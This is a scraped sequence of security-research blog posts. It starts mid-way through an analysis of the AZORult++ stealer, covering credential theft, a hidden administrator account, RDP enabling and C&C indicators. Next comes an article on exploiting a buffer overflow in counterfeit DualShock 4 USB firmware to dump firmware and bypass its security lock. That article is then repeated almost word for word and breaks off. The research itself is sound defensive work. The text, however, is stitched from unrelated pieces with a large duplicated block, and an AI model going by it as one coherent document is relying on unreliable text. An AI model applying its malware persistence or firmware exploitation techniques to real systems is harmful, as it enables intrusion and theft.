But at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.


Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.


Examples of different versions of AZORult in operation (data encrypted using XOR)

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+–+-“, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+–+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.

Conclusion

During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.

IoC

C&C servers
http://ravor.ac[.]ug
http://daticho.ac[.]ug

MD5
08EB8F2E441C26443EB9ABE5A93CD942
5B26880F80A00397BC379CAF5CADC564
B0EC3E594D20B9D38CC8591BAFF0148B
FE8938F0BAAF90516A90610F6E210484

Securelist: Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.


Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.


Unauthorized Gator Claw gamepad

There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.


Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.


Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.


Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware’s base address.

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.


Configuration file with description of different microcontrollers

After searching the microcontroller identificators from the config file, we found the site of the manufacturer – Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.


The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?


Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.


Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that is why many vendors only distribute the SDK after an NDA is signed.


Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.


Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.


Examples of product PCB design

Revelations

By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.


Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…


Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.


Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. USB protocol defines two entities – one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.


Connection scheme of USB devices

Data and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.


Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented with the use of packets provided according to the scheme below.


Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.


Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.


Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.


Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.

Exploitation

To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.


Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and depending on the type of report it will either send data with the function USBD_PrepareCntrlIn() or will receive with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.


Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.


Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 kb during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).


Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.


Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.


Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.


Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.


Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.


Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.


UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.


Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).


Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.


Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.


Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.


Revealing the firmware update encryption key

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.

Conclusion

This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.



Securelist

Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.


Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back among the cryptographic constants N and E (public key) needed to verify it. These constants are unique for all manufactured DualShock 4 gamepads. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are equal for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.


Unauthorized Gator Claw gamepad

There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.


Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.


Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.


Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware’s base address.

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.


Configuration file with description of different microcontrollers

After searching the microcontroller identificators from the config file, we found the site of the manufacturer – Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.


The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?


Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.


Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that is why many vendors only distribute the SDK after an NDA is signed.


Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.


Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.


Examples of product PCB design

Revelations

By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.


Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…


Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.


Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. USB protocol defines two entities – one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.


Connection scheme of USB devices

Data and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.


Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented with the use of packets provided according to the scheme below.


Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.


Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.


Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.


Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.

Exploitation

To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.


Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and depending on the type of report it will either send data with the function USBD_PrepareCntrlIn() or will receive with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.


Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.


Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 kb during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

